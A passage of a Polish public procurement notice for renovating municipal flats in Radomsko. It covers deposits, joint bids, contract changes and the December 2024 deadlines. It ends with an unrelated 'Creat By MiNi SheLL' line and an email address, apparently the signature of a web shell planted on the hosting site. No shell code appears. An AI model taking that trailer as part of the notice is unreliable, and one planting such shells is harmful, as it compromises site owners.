Zamawiającego.<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>5. Jeżeli wadium zostanie wniesione w formie, o której mowa w pkt 12.3 ppkt 2-4 wówczas Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej wystawiony na rzecz Zamawiającego (przed<br/>upływem terminu określonego w pkt 16.2 niniejszej SWZ).<br/>Dokument ten musi zachować ważność przez okres związania ofertą.<br/>W/w dokument musi zawierać w swojej treści oświadczenie poręczyciela lub gwaranta, że zobowiązuje się on do<br/>nieodwołalnej i bezwarunkowej wypłaty wadium na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty.<br/>Tym samym, wadium musi zabezpieczać ofertę w sposób dający Zamawiającemu pewność pełnego zaspokojenia jego<br/>roszczeń zarówno co do ich maksymalnego zakresu, jak również bezwarunkowej i nieodwołalnej ich realizacji na pierwsze<br/>pisemne żądanie wzywające do zapłaty, w przypadku wystąpienia okoliczności ustawowych uprawniających do zatrzymania<br/>wadium.<br/>6. Jeżeli wadium zostanie wniesione w pieniądzu - przelewem, na poleceniu przelewu należy wpisać: „Wadium – Remont<br/>lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 1/11 i 21, ul. Warszyca 4/16 i 6, ul. Wyszyńskiego 24/7, ul.<br/>Narutowicza 31/3 i 42/2, ul. Młodzowskiej 1/6, ul. Piłsudskiego 25/8 oraz ul. Plac 3 Maja 12/4 część nr ………. zamówienia”<br/>7. Zamawiający będzie dokonywał zwrotu lub zatrzymania wadium zgodnie z art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej). Wszelka korespondencja<br/>prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, przy użyciu Platformy e-Zamówienia,<br/>2.Oferta Wykonawców, o których mowa w pkt 8.1 SWZ powinna spełniać następujące wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego;<br/>2) pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>a) postępowania o zamówienie publiczne, którego dotyczy;<br/>b) wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem<br/>adresu siedziby;<br/>c) ustanowionego Pełnomocnika oraz zakres jego umocowania;<br/>3)W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 10.1 ppkt4<br/>(art. 125 ust. 1) SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu,<br/>4)W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane lub usługi , do realizacji których te zdolności są wymagane.<br/>5) Wykonawcy wspólnie składający ofertę, dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>usługi wykonają poszczególni wykonawcy. Wzór przedmiotowego oświadczenia stanowi dodatek nr 4 do SWZ.<br/>6) oświadczenia, o których mowa w pkt 10.3.1 ppkt 1 SWZ składa każdy z Wykonawców osobno;<br/>7) w odniesieniu do warunków określonych w pkt 5.2 SWZ - warunek udziału w postępowaniu, o którym mowa w pkt 5.2<br/>ppkt 4.1.1 SWZ (dot. części nr 1 zamówienia), w pkt 5.2 ppkt 4.1.2 SWZ (dot. części nr 2 zamówienia), w pkt 5.2 ppkt 4.1.3<br/>SWZ (dot. części nr 3 zamówienia) – wiedza i doświadczenie – winien spełnić samodzielnie przynajmniej jeden z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tzn. przynajmniej jeden z takich Wykonawców powinien<br/>posiadać pełne wymagane doświadczenie (brak możliwości sumowania doświadczenia kilku Wykonawców),<br/>3.Szczegółowe informacje w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany umowy. Postanowienia dotyczące dopuszczalnych zmian umowy, zostały<br/>określone we wzorze/projekcie umowy stanowiącym odpowiednio dodatek nr 8a do niniejszej SWZ (dot. części nr 1<br/>zamówienia), dodatek nr 8b do niniejszej SWZ (dot. części nr 2 zamówienia), dodatek nr 8c do niniejszej SWZ (dot. części<br/>nr 3 zamówienia) oraz w art. 455 ust. 1 pkt 2,3,4 ustawy oraz art. 455 ust. 2 ustawy Prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę przy użyciu Platformy e-Zamówienia, za pośrednictwem zakładki „Oferty/wnioski”,widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Link prowadzący bezpośrednio do widoku postępowania na Platformie: podany w pkt 3.1 Ogłoszenia o zamówieniu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-16 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiającym jest Miasto Radomsko ul. Tysiąclecia 5, 97-500 Radomsko<br/>NIP 772-22-61-587 REGON 590648238 w imieniu którego działa i przeprowadza postępowanie Inwestor zastępczy -<br/>Towarzystwo Budownictwa Społecznego w Radomsku Sp. z o.o. NIP: 772–20–84–240 Regon: 592131798<br/>ul. Kościuszki 12A, 97-500 Radomsko

Creat By MiNi SheLL
Email: jattceo@gmail.com